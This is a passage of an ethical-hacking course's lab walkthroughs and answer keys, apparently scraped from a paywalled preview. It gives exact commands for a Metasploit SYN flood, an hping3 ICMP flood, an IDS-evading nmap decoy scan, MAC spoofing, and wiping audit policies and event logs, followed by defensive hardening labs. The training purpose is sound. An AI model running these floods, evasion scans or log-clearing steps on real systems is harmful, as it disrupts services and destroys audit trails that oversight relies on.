Use Metasploit to send a SYN flood attack as follows:
o
Remote host:
192.168.0.10
o
Source host:
192.168.0.33
o
Set the FTP port to match the FTP port used by CorpServer.
•
Use Wireshark to capture the SYN flood on the enp2s0 network interface.
•
Filter to show only TCP SYN packets.
•
Find the MAC address of the computer causing the SYN flood.
•
Answer the questions.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Complete this lab as follows:
1.
From Zenmap, use nmap to find the FTP port used on CorpServer as follows:
a.
From the Favorites bar, open Zenmap.
b.
In the Command field, type
nmap -p 0-100 192.168.0.10
c.
Select
Scan
.
CorpServer is using port 21 for FTP.
d.
Close Zenmap.
2.
Use Metasploit to send a SYN flood as follows:
a.
From the Favorites bar, open Metasploit Framework.
b.
At the prompt, type
search synflood
and press
Enter
to find a SYN flood
Metasploit module.
c.
Type
use auxiliary/dos/tcp/synflood
and press
Enter
to select the SYN
flood module.
d.
Type
show options
and press
Enter
to view the current options for the SYN
flood module.
Notice that RHOST and SHOST are unassigned and RPORT is set to port 80.
e.
Type
set rhost 192.168.0.10
and press
Enter
to set the RHOST address.
f.
Type
set shost 192.168.0.33
and press
Enter
to set the SHOST address.
g.
Type
set rport 21
and press
Enter
to set the FTP port.
h.
Type
show options
and press
Enter
to view the new options for the SYN
flood module.
Notice that RHOST and SHOST have IP addresses assigned and RPORT is set
to port 21 matching CorpServer.
3.
Capture SYN flood attacks on the CorpServer machine as follows:
a.
From the Favorites bar, open Wireshark.
b.
Under Capture, select
enp2s0
.
c.
In the Apply a display filter field, type
host 192.168.0.10 and
tcp.flags.syn==1
d.
Press
Enter
.
e.
Select the
blue fin
to begin a Wireshark capture.
Notice that no packets are being captured.
4.
In Metasploit, type
exploit
and press
Enter
to start a SYN flood.
5.
Capture packets for a few seconds.
6.
In Wireshark, select the
red box
to stop the Wireshark capture.
Notice the time between each packet sent to host 192.168.1.10. Notice that only SYN
packets were captured.
7.
In the top right, select
Answer Questions
.
8.
Answer question 1.
9.
In the middle pane, expand
Ethernet II
.
Notice the source MAC address of the computer sending the SYN flood.
10.
Answer question 2.
11.
Select
Score Lab
.
Lab Questions:
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
1.
What is the source IP address of the SYN flood attack?
a.
192.168.0.33
2.
Which of the following MAC addresses is initiating the SYN flood attack?
a.
00:60:98:7F:41:E0 (IT-Laptop)
QUESTION 8:
You are the IT administrator for a small corporate network, and you
want to know how to find and recognize an ICMP flood attack. You
know that you can do this using Wireshark and hping3.
In this lab, your task is to create and examine the results of an ICMP
flood attack as follows:
•
From Kali Linux, start a capture in Wireshark for the esp20
interface.
•
Ping CorpDC at 192.168.0.11.
•
Examine the ICMP packets captured.
•
Use hping3 to launch an ICMP flood attack against CorpDC.
•
Examine the ICMP packets captured.
•
Answer the questions.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 5 minutes 9 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Filter for ICMP packets
Run ping
Run hping3 for ICMP flood
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Q1
What is the main difference between a normal icmp (ping) request and an icmp flood?
(Select TWO).
Explanation
In this lab, your task is to create and examine the results of an ICMP flood attack as follows:
•
From Kali Linux, start a capture in Wireshark for the esp20 interface.
•
Ping CorpDC at 192.168.0.11.
•
Examine the ICMP packets captured.
•
Use hping3 to launch an ICMP flood attack against CorpDC.
•
Examine the ICMP packets captured.
•
Answer the questions.
Complete this lab as follows:
1.
From the Favorites bar, open Wireshark.
2.
Under Capture, select
enp2s0
.
3.
Select the
blue fin
to begin a Wireshark capture.
4.
From the Favorites bar, open Terminal.
5.
At the prompt, type
ping 192.168.0.11
and press
Enter
.
6.
After some data exchanges, press
Ctrl
+
c
to stop the ping process.
7.
In Wireshark, select the
red box
to stop the Wireshark capture.
8.
In the Apply a display filter field, type
icmp
and press
Enter
.
Notice the number of packets captured and the time between each packet being sent.
9.
Select the
blue fin
to begin a new Wireshark capture.
10.
In Terminal, type
hping3 --icmp --flood 192.168.0.11
and press
Enter
to start a ping
flood against CorpDC.
11.
In Wireshark, select the
red box
to stop the Wireshark capture.
Notice the type, number of packets, and the time between each packet being sent.
12.
In Terminal, type
Ctrl
+
c
to stop the ICMP flood.
13.
In the top right, select
Answer Questions
.
14.
Answer the questions.
15.
Select
Score Lab
.
Lab Questions:
1.
What was the main difference between the normal icmp (ping) request and the
icmp flood? (select TWO.)
a.
With the icmp flood, icmp packets are sent more rapidly.
b.
With the flood, all packets come from the source.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
QUESTION 9:
You are an ethical hacker consultant working for CorpNet. They want
you to discover weaknesses in their network. From outside of the
CorpNet network, you found their web server, www.corpnet.xyz, has
an IP address of 198.28.1.1. You decide to perform several nmap
scans using a few http scripts.
In this lab, your task is to run the following nmap scripts on port 80 of
198.28.1.1:
•
http-server-header.nse to display the HTTP server header.
•
http-chrono.nse to measure the time a website takes to deliver a
web page.
•
http-headers.nse to perform a HEAD request for the root folder.
•
http-errors.nse to crawl through the website and return any error
pages.
•
http-malware-host.nse to look for malware signatures of known
server compromises.
•
http-comments-displayer.nse to display HTML and JavaScript
comments.
Your Performance
Your Score: 9 of 9 (100%)
Pass Status:
Pass
Elapsed Time: 4 minutes 8 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Display the HTTP server header
Q1
Which software is used by www.corpnet.com to offer the HTTP service?
Measure the time a website takes to deliver a web page
Perform a HEAD request for the root folder
Crawl through the website and return any error pages
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Q2
How many error pages were found?
Look for the malware signatures of known server compromises
Display HTML and JavaScript comments
Q3
What is the last comment listed on line 20 of the web page at http://www.corpnet.xyz:80?
Explanation
In this lab, your task is to run the following nmap scripts on port 80 of 198.28.1.1:
•
http-server-header.nse to display the HTTP server header.
•
http-chrono.nse to measure the time a website takes to deliver a web page.
•
http-headers.nse to perform a HEAD request for the root folder.
•
http-errors.nse to crawl through the website and return any error pages.
•
http-malware-host.nse to look for maleware signatures of known server compromises.
•
http-comments-displayer.nse to display HTML and JavaScript comments.
Complete this lab as follows:
1.
From the Favorites bar, open Terminal.
2.
At the prompt, type
nmap --script=http-server-header -p80 198.28.1.1
and
press
Enter
to run the http-server-header.nse script.
3.
In the top right, select
Answer Questions
.
4.
Answer question 1.
5.
Type
nmap --script=http-chrono -p80 198.28.1.1
and press
Enter
to run the http-
chrono.nse script.
6.
Type
nmap --script=http-headers -p80 198.28.1.1
and press
Enter
to run the http-
headers.nse script.
7.
Type
nmap --script=http-errors -p80 198.28.1.1
and press
Enter
to run the http-
errors.nse script.
8.
Under Lab Questions
,
answer question 2.
9.
Type
nmap --script=http-malware-host -p80 198.28.1.1
and press
Enter
to run the
http-malware-host.nse script.
10.
Type
nmap --script=http-comments-displayer -p80 198.28.1.1
and press
Enter
to run
the http-comments-displayer.nse script.
11.
Under Lab Questions
,
answer question 3.
12.
Click
Score Lab
.
Lab Questions:
1.
Which software is used by
www.corpnet.xyz
to offer the HTTP service?
a)
Apache 2.4.7.
2.
How many error pages were found?
a)
0
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
3.
What is the last comment listed on line 20 of the web page at
http://www.corpnet.xyz:80
?
a)
<!--END Google Analytics Code-- >
QUESTION 10:
You are a cybersecurity consultant. The company hiring you suspects
that employees are connecting to a rogue access point (AP). You
need to find the name of the hidden rogue AP so it can be
deauthorized. The computer suspected of using the rogue access
point is Exec-Laptop.
In this lab, your task is to complete the following:
•
On IT-Laptop, use
airmon-ng
to put the wireless adapter in
monitor mode.
•
Use
airodump-ng
to find the hidden access point.
•
On Exec-Laptop, connect to the rogue AP using the CoffeeShop
SSID.
•
Answer the question.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 3 minutes 29 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Set the the wlp1s0 wireless adapter to monitor mode
Find the hidden access point
Q1
What is the BSSID of the rogue access point?
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Explanation
In this lab, your task is to complete the following:
•
On IT-Laptop, use
airmon-ng
to put the wireless adapter in monitor mode.
•
Use
airodump-ng
to find the hidden access point.
•
On Exec-Laptop, connect to the rogue AP using the CoffeeShop SSID.
•
Answer the question.
Complete this lab as follows:
1.
On IT-Laptop, configure the wlp1s0 card to run in monitor mode as follows:
a.
From the Favorites bar, open Terminal.
b.
At the prompt, type
airmon-ng
and press
Enter
to find the name of the
wireless adapter.
c.
Type
airmon-ng start wlp1s0
and press
Enter
to put the adapter in monitor
mode.
d.
Type
airmon-ng
and press
Enter
to view the new name of the wireless
adapter.
2.
Use airodump-ng to discover and isolate the hidden access point as follows:
a.
Type
airodump-ng wlp1s0mon
and press
Enter
to discover all of the access
points.
b.
Press
Ctrl
+
c
to stop airodump-ng.
c.
Find the hidden access point ESSID
<length : 0>
.
d.
In the top right, select
Answer Questions
.
e.
Answer the question.
f.
In Terminal, type
airodump-ng wlp1s0mon --bssid
bssid_number
and
press
Enter
to isolate the hidden access point.
3.
Switch to the Exec-Laptop and connect to the Wi-Fi network as follows:
a.
From the top navigation tabs, select
Floor 1 Overview
.
b.
Under Executive Office, select
Exec-Laptop
.
c.
From the notification area, select the
Wi-Fi network
icon.
d.
Select
Hidden Network
.
e.
Select
Connect
.
f.
In the Enter the name (SSID) for the network field, type
CoffeeShop
.
In a real environment, you'll only need to wait until the employee connects to
the rogue access point again.
g.
Select
Next
.
h.
Select
Yes
.
i.
Under Lab Questions, select
Score Lab
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
QUESTION 11:
You work for a penetration testing consulting company. You need to
make sure that you can't be identified by the intrusion detection
systems. Use nmap to perform a decoy scan on CorpNet.local.
In this lab, your task is to use nmap to perform a decoy scan on
enp2s0 and to use Wireshark to see the results.
•
Use Wireshark to capture packets on the
enp2s0
network
interface.
•
Use nmap to perform a decoy scan targeting the
192.168.0.31
IP
address using
10
random IP addresses.
Your Performance
Your Score: 1 of 1 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 44 seconds
Required Score: 100%
Task Summary
Required Actions
Perform a decoy scan
Explanation
In this lab, your task is to use nmap to perform a decoy scan on enp2s0 and to use Wireshark to see
the results.
•
Use Wireshark to capture packets on the
enp2s0
network interface.
•
Use nmap to perform a decoy scan targeting the
192.168.0.31
IP address
using
10
random IP addresses.
Complete this lab as follows:
1.
From the Favorites bar, open Wireshark.
2.
Under Capture, select
enp2s0
.
3.
In the upper left menu, select the
blue fin
to start a scan.
4.
From the Favorites bar, open Terminal.
5.
At the prompt, type
nmap -D RND:10 192.168.0.31
and press
Enter
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
6.
Maximize the window for easier viewing.
7.
In Wireshark, scroll down until you see
192.168.0.31
in the Destination column.
8.
Under Source, view the different IP addresses used to disguise the scan.
QUESTION 12:
As the IT security specialist for your company, you're performing a
penetration test to verify email security. You are specifically concerned
that the HR department may be sending employee's personally
identifiable information (PII) in clear text through emails.
In this lab, your task is to:
•
Capture packets on the enp2s0 interface using Wireshark.
•
Find packets containing the following information using display
filters:
o
Social security numbers (SSN)
o
Birth dates
o
Direct deposit routing numbers
o
Mother's maiden name
o
Favorite car
o
Favorite movie
“
You can use the
tcp contains
desired_information
filter.
”
•
Answer the questions.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 4 minutes 55 seconds
Required Score: 100%
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Task Summary
Lab Questions
Q1
What is George Hanks' Social Security number?
Q2
What is Steven Joffer's favorite car?
Q3
How many packets contain Social Security numbers?
Q4
What is the 9-digit bank routing number for Julia?
Explanation
In this lab, your task is to:
•
Capture packets on the enp2s0 interface using Wireshark.
•
Find packets containing the following information using display filters:
o
Social security numbers (SSN)
o
Birth dates
o
Direct deposit routing numbers
o
Mother's maiden name
o
Favorite car
o
Favorite movie
•
Answer the questions.
Complete this lab as follows:
1.
From the Favorites bar, open Wireshark.
2.
Under Capture, select
enp2s0
.
3.
Select the
blue fin
to begin a Wireshark capture.
4.
After a few seconds, select the
red box
to stop the Wireshark capture.
5.
In the Apply a display filter field, type
tcp contains SSN
and press
Enter
.
6.
In the top right, select
Answer Questions
.
7.
In the bottom pane of Wireshark, examine the packet information to answer the
questions.
8.
Answer the questions.
9.
Select
Score Lab
.
Lab Questions:
1.
What is George Hank’s Social Security number?
a.
111-00-5555
2.
What is Steven Joffer’s favorite car?
a.
Aston Martin
3.
How many packets contain Social Security numbers?
a.
2
4.
What is the 9-digit bank routing number for Julia?
a.
999912341
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
A.2.4 Pro Domain 4: Cover Up
QUESTION 1:
You are a cybersecurity consultant and have been asked to work with
the ACME, Inc. company to ensure their network is protected from
hackers. As part of the tests, you need to disable logging on a
Windows system.
In this lab, your task is to use Windows PowerShell (as Admin) to:
•
View the current audit policies on the system.
•
Disable all audit policies.
•
Confirm that all the audits were disabled.
Your Performance
Your Score: 1 of 1 (100%)
Pass Status:
Pass
Elapsed Time: 3 minutes 7 seconds
Required Score: 100%
Task Summary
Required Actions
Disable all audit policies
Explanation
In this lab, your task is to use Windows PowerShell (as Admin) to:
•
View the current audit policies on the system.
•
Disable all audit policies.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
•
Confirm that all the audits were disabled.
Complete this lab as follows:
1.
Right-click
Start
and select
Windows PowerShell (Admin)
.
2.
Maximize the window for easier viewing.
3.
At the command prompt, type
auditpol /get /category:*
and press
Enter
to view the
current audit policies.
Notice the different settings used for each system.
4.
Type
auditpol /clear /y
and press
Enter
to disable all audit policies.
5.
Type
auditpol /get /category:*
and press
Enter
to confirm that the audits were
disabled.
Notice that all of the polices are now set to No Auditing.
QUESTION 2:
You are a cybersecurity consultant and have been asked to work with
the ACME, Inc. company to ensure that their network is protected from
hackers. As part of the tests, you need to clear a few log files.
In this lab, your task is to use Windows PowerShell (as Admin) to
clear the following event logs:
•
Use
get-eventlog
to view the available event logs.
•
Use
clear-eventlog
to clear the Application and System logs.
Your Performance
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 56 seconds
Required Score: 100%
Task Summary
Required Actions
Application log cleared
System log cleared
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Explanation
In this lab, your task is to use Windows PowerShell (as Admin) to clear the following event logs:
•
Use
get-eventlog
to view the available event logs.
•
Use
clear-eventlog
to clear the Application and System logs.
Complete this lab as follows:
1.
Right-click
Start
and select
Windows PowerShell (Admin)
.
2.
Maximize the window for easier viewing.
3.
At the prompt, type
Get-Eventlog -logname *
and press
Enter
.
In the Entries column, notice the number of entries for the logs.
4.
Type
Clear-Eventlog -logname Application
and press
Enter
.
5.
Type
Clear-Eventlog -logname System
and press
Enter
.
6.
Type
Get-Eventlog -logname *
and press
Enter
.
The log entries for Application is zero. The log entries for System is one because another
event occurred between the times you cleared the log and viewed the entry list.
QUESTION 3:
You are the IT security administrator for a small corporate network.
Recently, some of your firm's proprietary data leaked online. You have
been asked to use steganography to encrypt data into a file that will
be shared with a business partner. The data will allow you to track the
source if the information is leaked again.
In this lab, your task is to use OpenStego to hide data inside a picture
file as follows:
•
Encrypt the user data found in
John.txt
into
gear.png
.
•
Save the output file into the Documents folder as
send.png
.
•
Password protect the file with
NoMor3L3@ks!
as the password.
•
Confirm the functionality of the steganography by extracting the
data from
send.png
into the
Exports
folder and opening the
file to view the hidden user data.
Your Performance
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 3 minutes 21 seconds
Required Score: 100%
Task Summary
Required Actions
Encrypt John.txt into send.png and save it in the Documents folder
Password protect the file with with the password NoMor3L3@ks!
Confirm the functionality of the steganography
Hide Details
File created
File opened
Explanation
In this lab, your task is to use OpenStego to hide data inside a picture file as follows:
•
Encrypt the user data found in
John.txt
into
gear.png
.
•
Save the output file into the Documents folder as
send.png
.
•
Password protect the file with
NoMor3L3@ks!
as the password.
•
Confirm the functionality of the steganography by extracting the data
from
send.png
into the
Exports
folder and opening the file to view the hidden user data.
Complete this lab as follows:
1.
Encrypt the user data into the file to be shared as follows:
a.
In the search field on the taskbar, type
OpenStego
.
b.
Under Best match, select OpenStego.
c.
In the Message File field, select the
ellipses
at the end of the field.
d.
Select
John.txt
.
e.
Select
Open
.
f.
In the Cover File field, select the
ellipses
at the end of the field.
g.
Select
gear.png
file.
h.
Select
Open
.
i.
In the Output Stego File field, select the
ellipses
at the end of the field.
j.
In the File name field, enter
send.png
.
k.
Select
Open
.
2.
Password protect the file as follows:
a.
In the Password field, enter
NoMor3L3@ks!
b.
In the Confirm Password field, enter
NoMor3L3@ks!
c.
Select
Hide Data
.
d.
Select
OK
.
3.
Extract the data and open the file as follows:
a.
Under Data Hiding, select
Extract Data
.
b.
In the Input Stego File field, select the
ellipses
.
c.
Select
send.png
file with the encryption.
d.
Select
Open
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
e.
In the Output Folder for Message File field, select the
ellipses
.
f.
Double-click
Export
to set it as the destination of the output the file.
g.
Click
Select Folder
.
h.
In the Password field, enter
NoMor3L3@ks!
as the password.
i.
Select
Extract Data
.
j.
Select
OK
.
k.
From the taskbar, open File Explorer.
l.
Double-click
Documents
to navigate to the folder.
m.
Double-click
Export
to navigate to the folder.
n.
Double-click
John.txt
to open the output file and verify that the decryption
process was successful.
QUESTION 4:
As an IT administrator, you need to know how security breaches are
caused. You know that SMAC is used for MAC spoofing, so you are
going to spoof your MAC address.
In this lab, your task is to complete the following:
•
On Office2 use
ipconfig /all
and find the IP address and MAC
address.
•
Spoof the MAC address on ITAdmin to that of Office2 using
SMAC.
•
Refresh your MAC and IP addresses to match the target
machine.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 3 minutes 6 seconds
Required Score: 100%
Task Summary
Required Actions
Use ipconfig /all on Office2 to get the IP and MAC addresses
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Spoof the MAC address of ITAdmin
Update the IP address on ITAdmin
Explanation
In this lab, your task is to complete the following:
•
On Office2 use
ipconfig /all
and find the IP address and MAC address.
•
Spoof the MAC address on ITAdmin to that of Office2 using SMAC.
•
Refresh your MAC and IP addresses to match the target machine.
Complete this lab as follows:
1.
Find the IP address and MAC address as follows:
a.
Right-click
Start
and select
Windows PowerShell (Admin)
.
b.
At the command prompt, type
ipconfig /all
and press
Enter
.
c.
Find the
MAC address
and the
IP address
.
2.
Spoof the MAC address as follows:
a.
From the top navigation tabs, select
Floor 1 Overview
.
b.
Under IT Administration, select
ITAdmin
.
c.
In the search bar, type
SMAC
.
d.
Under Best match, right-click
SMAC
and select
Run as administrator
.
e.
In the New Spoofed Mac Address field, type
00:00:55:55:44:15
for the MAC
address from Office2.
f.
Select
Update MAC
.
g.
Select
OK
to restart the adapter.
3.
Refresh your MAC and IP addresses as follows:
a.
Right-click
Start
and select
Windows PowerShell (Admin)
.
b.
At the command prompt, type
ipconfig /all
to confirm the MAC address has
been updated.
c.
Type
ipconfig /renew
to update the IP address.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
A.2.5 Pro Domain 5: Defend a System
QUESTION 1:
You work at a penetration testing consulting company. Through
reconnaissance, it was found that your website is broadcasting banner
information. Your manager wants you to hide the IIS banners.
In this lab, your task is to configure the IIS web server to stop
broadcasting banners by removing HTTP response headers from the
CorpNet.xyz website.
Your Performance
Your Score: 1 of 1 (100%)
Pass Status:
Pass
Elapsed Time: 22 seconds
Required Score: 100%
Task Summary
Required Actions
Remove HTTP response headers from the CorpNet.xyz site
Hide Details
Remove the X-Powered-By header
Remove the X-Frame-Options header
Explanation
In this lab, your task is to configure the IIS web server to stop broadcasting banners by removing
HTTP response headers from the CorpNet.xyz website.
Complete this lab as follows:
1.
In Server Manager, select
Tools
>
Internet Information Services (IIS) Manager
.
2.
In the left pane, expand
CorpWeb(CorpNet.xyz\Administrator) Home
.
3.
Expand
Sites
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
4.
Select
CorpNet.xyz
.
5.
Double-click
HTTP Response Headers
.
6.
Select a
response header
.
7.
Under Actions, select
Remove
.
8.
Click
Yes
to confirm.
9.
Repeat steps 6
–
8 for each response header.
QUESTION 2:
You are the IT security administrator for a small corporate network.
Several of your users have reported that they are unable to connect to
the network. After examining their computers, they all seem to be
getting bad IP address information from a rogue DHCP server.
In this lab, your task is to identify the rogue DHCP server using
Wireshark:
•
Use Wireshark to capture and filter DHCP traffic.
•
Disable and enable the enp2s0 network interface to request a
new IP address from the DHCP server.
•
Find the rogue DHCP server.
•
Answer the questions.
“
Use bootp in Wireshark to isolate DHCP traffic. Use the Exhibit to
determine the IP address range used by the legitimate DHCP server.
”
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 2 minutes 14 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Capture and filter DHCP traffic
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Disable and enable the enp2s0 network interface
Q1
What is the IP address of the rogue DHCP server?
Q2
What is the IP address of the legitimate DHCP server?
Explanation
In this lab, your task is to identify the rogue DHCP server using Wireshark:
•
Use Wireshark to capture and filter DHCP traffic.
•
Disable and enable the enp2s0 network interface to request a new IP address from the
DHCP server.
•
Find the rogue DHCP server.
•
Answer the questions.
Complete this lab as follows:
1.
Use Wireshark to capture and filter DHCP traffic as follows:
a.
From the Favorites bar, select
Wireshark
.
b.
Under Capture, select
enp2s0
.
c.
Select the
blue fin
to begin a Wireshark capture.
d.
In the
Apply a display filter
field, type
bootp
and press
Enter
.
2.
Disable and enable the enp2s0 network interface as follows:
a.
From the Favorites bar, select
Terminal.
b.
At the prompt, type
ip addr show
and press
Enter
to view the current IP
configuration.
c.
Type
ip link set enp2s0 down
and press
Enter
.
d.
Type
ip link set enp2s0 up
and press
Enter
to enable the interface and
request an IP address from the DHCP server.
3.
Maximize the window for easier viewing.
4.
In Wireshark, under the Source column, find the
IP addresses
of the rogue and legitimate
DHCP servers that sent the DHCP Offer packets.
5.
In the top right, select
Answer Questions
.
6.
Answer the questions.
7.
Select
Score Lab
.
Lab Questions:
1.
What is the IP address of the range DHCP server?
a.
10.10.10.240
2.
What is the IP address of the legitimate DHCP server?
a.
192.168.0.14
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
QUESTION 3:
You are the IT administrator for a small corporate network. The
receptionist, Maggie Brown, uses an iPad to manage employee
schedules and messages. You need to help her make the iPad more
secure. The current simple passcode is 1542.
In this lab, your task is to:
•
Set a secure passcode on the iPad as follows:
o
Require a passcode:
After 5 minutes
o
New passcode:
KeepOutOfMyPad
o
Configure the iPad to erase data after 10 failed passcode
attempts.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 52 seconds
Required Score: 100%
Task Summary
Required Actions
Set a secure passcode on the iPad
Hide Details
Turn off Simple Passcode
Passcode: KeepOutOfMyPad
Set Require a passcode to after 5 minutes
Set Erase Data to after 10 failed password attempts.
Explanation
In this lab, your task is to:
•
Set a secure passcode on the iPad as follows:
o
Require a passcode:
After 5 minutes
o
New passcode:
KeepOutOfMyPad
•
Configure the iPad to erase data after 10 failed passcode attempts.
Complete this lab as follows:
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
1.
Set a secure passcode on the iPad as follows:
a.
Select
Settings
.
b.
From the left menu, select
Touch ID & Passcode
.
c.
Enter
1542
for the passcode.
d.
Select
Require Passcode
e.
Select
After 5 minutes
.
f.
At the top, select
Passcode Lock
.
g.
Next to Simple Passcode, slide the
switch
to turn off simple passcodes.
h.
Enter
1542
for the passcode.
i.
Enter
KeepOutOfMyPad
as the new passcode.
j.
Select
Next
.
k.
Enter
KeepOutOfMyPad
to re-enter the new passcode.
l.
Select
Done
.
2.
Configure the iPad to erase data after 10 failed passcode attempts as follows:
a.
On the Touch ID & Passcode page next to Erase Data, slide the
switch
to
enable Erase Data.
b.
Select
Enable
.
QUESTION 4:
You are the IT administrator for a small corporate network. The
company has a single Active Directory domain named CorpNet.xyz.
You need to increase the domain's authentication security. You need
to make sure that User Account Control (UAC) settings are consistent
throughout the domain and in accordance with industry
recommendations.
In this lab, your task is to configure the following UAC settings in the
Default Domain Policy on CorpDC as follows:
User Account Control
Setting
Admin Approval Mode for the Built-in Administrator
account
Enabled
Allow UIAccess applications to prompt for elevation
without using the secure desktop
Disabled
Behavior of the elevation prompt for administrators in
Admin Approval mode
Prompt for credentials
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Behavior of the elevation prompt for standard users
Automatically deny
elevation requests
Detect application installations and prompt for elevation
Enabled
Only elevate UIAccess applications that are installed in
secure locations
Enabled
Only elevate executables that are signed and validated
Disabled
Run all administrators in Admin Approval Mode
Enabled
Switch to the secure desktop when prompting for
elevation
Enabled
Virtualize file and registry write failures to per-user
locations
Enabled
“
User Account Control policies are set in a GPO linked to the domain.
In this scenario, edit the Default Domain Policy and configure settings
in the following path:
Computer Configuration
>
Policies
>
Windows
Settings
>
Security Settings
>
Local Policies
>
Security Options
”
Your Performance
Your Score: 10 of 10 (100%)
Pass Status:
Pass
Elapsed Time: 2 minutes 59 seconds
Required Score: 100%
Task Summary
Required Actions
Admin Approval Mode for the Built-in Administrator account: Enabled
Allow UIAccess applications to prompt for elevation without using the secure desktop:
Disabled
Behavior of the elevation prompt for administrators in Admin Approval mode: Prompt for
credentials
Behavior of the elevation prompt for standard users: Automatically deny elevation requests
Detect application installations and prompt for elevation: Enabled
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Only elevate UIAccess applications that are installed in secure locations: Enabled
Only elevate executables that are signed and validated: Disabled
Run all administrators in Admin Approval Mode: Enabled
Switch to the secure desktop when prompting for elevation: Enabled
Virtualize file and registry write failures to per-user locations: Enabled
Explanation
In this lab, your task is to configure the following UAC settings in the Default Domain Policy on
CorpDC as follows:
User Account Control
Setting
Admin Approval Mode for the Built-in Administrator
account
Enabled
Allow UIAccess applications to prompt for elevation
without using the secure desktop
Disabled
Behavior of the elevation prompt for administrators in
Admin Approval mode
Prompt for credentials
Behavior of the elevation prompt for standard users
Automatically deny elevation
requests
Detect application installations and prompt for elevation
Enabled
Only elevate UIAccess applications that are installed in
secure locations
Enabled
Only elevate executables that are signed and validated
Disabled
Run all administrators in Admin Approval Mode
Enabled
Switch to the secure desktop when prompting for
elevation
Enabled
Virtualize file and registry write failures to per-user
locations
Enabled
Complete this lab as follows:
1.
From Hyper-V Manager, select
CORPSERVER
.
2.
Right-click
CorpDC
and select
Connect
.
3.
From Server Manager, select
Tools
>
Group Policy Management
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
4.
Maximize the window for easier viewing.
5.
Expand
Forest: CorpNet.local
.
6.
Expand
Domains
.
7.
Expand
CorpNet.local
.
8.
Right-click
Default Domain Policy
and select
Edit
.
9.
Maximize the window for easier viewing.
10.
Under Computer Configuration, expand
Policies
.
11.
Expand
Windows Settings
.
12.
Expand
Security Settings
.
13.
Expand
Local Policies
.
14.
Select
Security Options
.
15.
In the right pane, right-click the
policy
you want to edit and select
Properties
.
16.
Select
Define this policy setting
.
17.
Select
Enable
or
Disable
as necessary.
18.
Edit the
value
for the policy as needed and then click
OK
.
19.
Repeat steps 8
–
11 for each policy setting.
QUESTION 5:
You are the IT administrator for a small corporate network. You are
attempting to improve the password security of the Windows 10 laptop
in the Lobby.
In each policy, the Explain tab provides a description of the effects of
the policy to help you identify which policy to configure with which
value.
In this lab, your task is to use the Local Security Policy tool to
configure password restrictions as follows:
•
Passwords must be at least 10 characters long.
•
Passwords must be changed every 30 days.
•
New passwords cannot be the same as the previous four
passwords.
•
New passwords cannot be changed for at least two days.
•
Passwords must contain non-alphabetical characters.
•
Lock the user account after four incorrect logon attempts within a
30-minute period.
•
Automatically unlock locked accounts after one hour.
Your preview ends here
